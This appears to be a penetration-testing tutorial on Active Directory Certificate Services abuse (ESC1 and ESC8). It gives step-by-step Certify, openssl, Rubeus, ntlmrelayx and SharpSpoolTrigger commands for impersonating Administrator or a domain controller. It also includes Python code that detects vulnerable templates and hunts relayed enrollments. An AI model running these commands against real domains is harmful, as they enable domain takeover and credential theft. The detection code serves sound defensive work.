Active Directory Certificate Services (AD CS) is a customizable service for issuing and managing digital certificates. These digital certificates can be used for the authentication of computer, user, or device accounts on a network.

Misconfigured Certificate Templates

This is the classic template misconfiguration (ESC1): a template that grants enrollment rights to low-privileged principals, lets the enrollee supply the subject name (ENROLLEE_SUPPLIES_SUBJECT), carries an EKU usable for authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication or Any Purpose), and requires neither manager approval nor authorized signatures. Any domain user can then request a certificate carrying another account's UPN in the SAN and use it to authenticate as that account.
To check whether any such template exists, run the following command.
If "<DOMAIN>\Domain Users" (or Authenticated Users, Domain Computers, Everyone) appears in the enrollment rights, any domain user may request a certificate from that template.
.\Certify.exe find /vulnerable
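The conditions Certify tests for when it reports a template as vulnerable, written out as an added Python example (this is not Certify's code). It assumes the template attributes have been read from the Certificate Templates container of the Configuration partition and that the principals holding the Enroll extended right have already been parsed out of the template's nTSecurityDescriptor into an `enroll_sids` list; the sample templates are constructed for the demonstration.

```python
"""ESC1 template check, added example (not Certify's own code).

Assumes each template is a dict of raw LDAP attribute values plus an
'enroll_sids' list of trustees that hold the Enroll extended right
(parsed from nTSecurityDescriptor beforehand; that parsing is not shown).
"""

# Flag bits from msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002  # "CA certificate manager approval"

# EKUs that make a certificate usable for authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals whose Enroll right makes a template reachable by any domain account.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}           # Domain Users, Domain Computers


def is_low_priv(sid: str) -> bool:
    """True for well-known or domain SIDs that every domain user/computer holds."""
    if sid in LOW_PRIV_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def allows_authentication(ekus) -> bool:
    """An empty pKIExtendedKeyUsage means 'all purposes', which includes client auth."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_vulnerable(template: dict) -> bool:
    """All five ESC1 conditions must hold for the template to be abusable."""
    low_priv_enrollers = [s for s in template.get("enroll_sids", []) if is_low_priv(s)]
    return all((
        bool(low_priv_enrollers),
        bool(template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        allows_authentication(template.get("pKIExtendedKeyUsage", [])),
        not template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS,
        template.get("msPKI-RA-Signature", 0) == 0,  # no authorized signatures required
    ))


def find_vulnerable(templates: list) -> list:
    """Return the cn of every template that satisfies the ESC1 conditions."""
    return [t["cn"] for t in templates if esc1_vulnerable(t)]


# Constructed sample data: a fictional domain SID prefix S-1-5-21-1111-2222-3333.
DOMAIN_USERS = "S-1-5-21-1111-2222-3333-513"
DOMAIN_ADMINS = "S-1-5-21-1111-2222-3333-512"
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
SERVER_AUTH = "1.3.6.1.5.5.7.3.1"

SAMPLE_TEMPLATES = [
    # Default-style User template: subject is built from AD, so not ESC1.
    {"cn": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [CLIENT_AUTH], "enroll_sids": [DOMAIN_USERS]},
    # Enrollee supplies subject + client auth + Domain Users can enroll: vulnerable.
    {"cn": "VulnTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [CLIENT_AUTH], "enroll_sids": [DOMAIN_USERS]},
    # Same, but manager approval is required: not directly abusable.
    {"cn": "ApprovalRequired", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [CLIENT_AUTH], "enroll_sids": [DOMAIN_USERS]},
    # Subject supplied by enrollee but EKU is Server Authentication only.
    {"cn": "WebServerOnly", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [SERVER_AUTH], "enroll_sids": [DOMAIN_USERS]},
    # Everything wrong, but only Domain Admins can enroll.
    {"cn": "AdminOnly", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [], "enroll_sids": [DOMAIN_ADMINS]},
]

if __name__ == "__main__":
    for name in find_vulnerable(SAMPLE_TEMPLATES):
        print(f"[!] ESC1: {name}")
```

Each of the five conditions is necessary: a template that fails only one of them (approval required, wrong EKU, admin-only enrollment) is not reported, which is also why Certify's output should be read condition by condition rather than as a single "vulnerable" bit.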
These are the steps to exploit this vulnerability.
1. Using Certify, request a certificate from the vulnerable template with a highly privileged account (e.g. Administrator) as the alternative name, then save the private key and certificate that Certify prints into a file such as cert.pem.
2. Convert cert.pem into a PFX (PKCS#12) file. openssl prompts for an export password; Rubeus needs it later.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
3. Base64 encode the certificate to use it with Rubeus.
cat cert.pfx | base64 -w 0
4. Request a TGT using the encoded certificate.
.\Rubeus.exe asktgt /user:Administrator /nowrap /password:<EXPORTING_PASSWORD> /certificate:<BASE64>

NTLM Relaying to ADCS HTTP Endpoints

This applies when the CA's web enrollment role is installed and accepts NTLM authentication (ESC8). You coerce a DC (or any other host) into authenticating to the attacker machine, relay that NTLM authentication to the web enrollment endpoint, receive a certificate issued for the coerced machine account, and use it to obtain a TGT for that account. Requiring HTTPS with Extended Protection for Authentication (EPA) on the endpoint, or disabling NTLM on it, breaks the relay.
AD CS supports HTTP enrollment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv
You cannot relay NTLM authentication back to the originating machine. We therefore would not be able to relay a DC to a CA if both services were running on the same host.
The relayed account does not have to be a DC: a certificate for any machine account yields that machine's TGT, so a host configured for unconstrained delegation is another worthwhile target to relay.
These are the steps to exploit this vulnerability.
1. Run ntlmrelayx on the attacker machine, targeting the CA's web enrollment endpoint. If the coerced account is a DC, add --template DomainController, since DC accounts cannot enroll in the default Machine template.
sudo proxychains ntlmrelayx.py -t https://<ADCS>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
2. Force the DC to authenticate to the attacker machine. ntlmrelayx prints the issued certificate as a base64-encoded PFX.
Any of the coercion tools listed under Unconstrained Delegation will work, for example:
.\SharpSpoolTrigger.exe <TARGET_DC> <ATTACKER_MACHINE>
3. Request a TGT for the machine account with the certificate (PKINIT). With a DC machine account TGT you can DCSync directly; for other hosts, S4U2Self can then be used to obtain a service ticket for a privileged user on that host.
.\Rubeus.exe asktgt /user:<HOSTNAME>$ /ptt /certificate:<BASE64_CERTIFICATE>
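The defensive counterpart to the procedure above, as an added Python example that is not part of the original page: a hunt over the CA's IIS logs for ESC8-style relays. It assumes the web enrollment site logs in the W3C format with a #Fields: header (the column set is taken from that header, not hard-coded) and that machine accounts never legitimately use the web form, since computers autoenroll over RPC/DCOM; a machine account (name ending in $) POSTing to /certsrv/certfnsh.asp is therefore flagged. The log lines are constructed for the demonstration.

```python
"""ESC8 hunt over IIS W3C logs of the AD CS web enrollment site (added example).

Assumption: computers enroll via RPC/DCOM autoenrollment, so a machine account
(ending in '$') submitting the web enrollment form is a relay indicator.
"""
from collections import defaultdict

ENROLL_FORM = "/certsrv/certfnsh.asp"


def parse_iis_log(text: str) -> list:
    """Turn a W3C IIS log into a list of dicts keyed by the #Fields: header names."""
    fields, records = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # IIS may emit a new header mid-file
            continue
        if line.startswith("#") or not fields:
            continue
        values = line.split()       # IIS replaces spaces inside values with '+'
        if len(values) != len(fields):
            continue                # malformed or truncated line
        records.append(dict(zip(fields, values)))
    return records


def is_machine_account(username: str) -> bool:
    """'-' is IIS's anonymous placeholder; DOMAIN\\HOST$ and HOST$ are machine accounts."""
    return username != "-" and username.endswith("$")


def find_relayed_enrollments(records: list) -> list:
    """Return form submissions to the enrollment endpoint made as a machine account."""
    hits = []
    for r in records:
        if (r.get("cs-method") == "POST"
                and r.get("cs-uri-stem", "").lower().endswith(ENROLL_FORM)
                and is_machine_account(r.get("cs-username", "-"))):
            hits.append(r)
    return hits


def client_ips_per_account(hits: list) -> dict:
    """Map each flagged account to the client IPs it enrolled from.

    The relay comes from the attacker's IP, not the coerced host's own address,
    so comparing these against DNS for the host is the analyst's next step.
    """
    ips = defaultdict(set)
    for r in hits:
        ips[r["cs-username"]].add(r["c-ip"])
    return dict(ips)


# Constructed sample log: fictional CORP domain, CA at 10.0.0.5, attacker at 10.0.0.99.
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-05-01 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-05-01 10:00:01 10.0.0.5 GET /certsrv/certrqxt.asp - 80 CORP\jdoe 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 200
2023-05-01 10:00:07 10.0.0.5 POST /certsrv/certfnsh.asp - 80 CORP\jdoe 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 200
2023-05-01 10:03:11 10.0.0.5 GET /certsrv/ - 80 - 10.0.0.99 python-requests/2.28 401
2023-05-01 10:03:12 10.0.0.5 POST /certsrv/certfnsh.asp - 80 CORP\DC01$ 10.0.0.99 python-requests/2.28 200
"""

if __name__ == "__main__":
    hits = find_relayed_enrollments(parse_iis_log(SAMPLE_LOG))
    for r in hits:
        print(f"[!] {r['date']} {r['time']} {r['cs-username']} enrolled via web form from {r['c-ip']}")
    print(client_ips_per_account(hits))
```

The same check can be run over a CA's Windows Security log (event 4887, "Certificate Services approved a certificate request") by looking for a Requester ending in $ whose request attributes name the web enrollment client; that variant is not shown here.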